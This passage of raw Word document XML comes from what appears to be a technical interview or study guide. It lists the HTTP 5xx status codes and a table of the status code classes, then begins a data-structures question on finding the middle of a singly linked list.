    <w:p w14:paraId="17084CEA" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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502 Bad Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server received an invalid response from an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B680D" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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503 Service Unavailable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is temporarily unable to handle the request (e.g., due to overload or maintenance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5399A7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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504 Gateway Timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server did not receive a timely response from an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3AA132" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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505 HTTP Version Not Supported</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server does not support the HTTP protocol version that was used in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346A2A6" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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506 Variant Also Negotiates</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has an internal configuration error where content negotiation itself failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAAFF2" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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507 Insufficient Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is unable to store the representation needed to complete the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C9123" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>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508 Loop Detected</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server detected an infinite loop while processing the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1078A45D" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1820"/>
        </w:num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510 Not Extended</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Further extensions to the request are required for the server to fulfill it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46438C" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00000000" w:rsidP="004C737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5DA191">
          <v:rect id="_x0000_i1986" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A41CD" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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9"/>
        <w:gridCol w:w="1284"/>
        <w:gridCol w:w="4930"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="3C97CF2B" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DB3DB3" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADAC8E7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="365A2DB2" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="56E74792" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26F385BB" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:p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1xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675E19FE" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201814EB" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Request received, processing in progress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="41E093A1" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01B1A1D5" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:p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2xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169A0A2D" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E8510C1" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The request was successful.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="1009D277" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F8C6752" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:p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3xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28649AD8" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Redirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36951315" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Further action required to complete request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="15631F26" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63DBDDCB" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:p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4xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D8A84A" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Client Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06BCD5CF" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The request contains bad syntax or cannot be fulfilled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="1D8E49E0" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16AEAA15" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BFA0B9" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Server Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6385C2C7" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C7374">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The server failed to fulfill a valid request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76B4DA55" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each status code provides information about the outcome of the HTTP request, helping both the client and server understand the request's result and guide further actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C8797B" w14:textId="29DB58FB" w:rsidR="00E41215" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E4121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DE94A7C">
          <v:rect id="_x0000_i1987" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54054C" w14:textId="7903227F" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74B00" w:rsidP="004F5B43">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42C331" w14:textId="3A27A790" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006639B9" w:rsidP="006639B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="_Toc196307888"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="28471DC5" w14:textId="77777777" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006639B9" w:rsidP="006639B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4DE8DB" w14:textId="25DF8EB0" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006B6A98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc196307889"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find the middle element from the singly linked list without finding the length</w:t>
      </w:r>
      <w:r w:rsidR="006639B9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w14:paraId="04A6527A" w14:textId="3FA22586" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
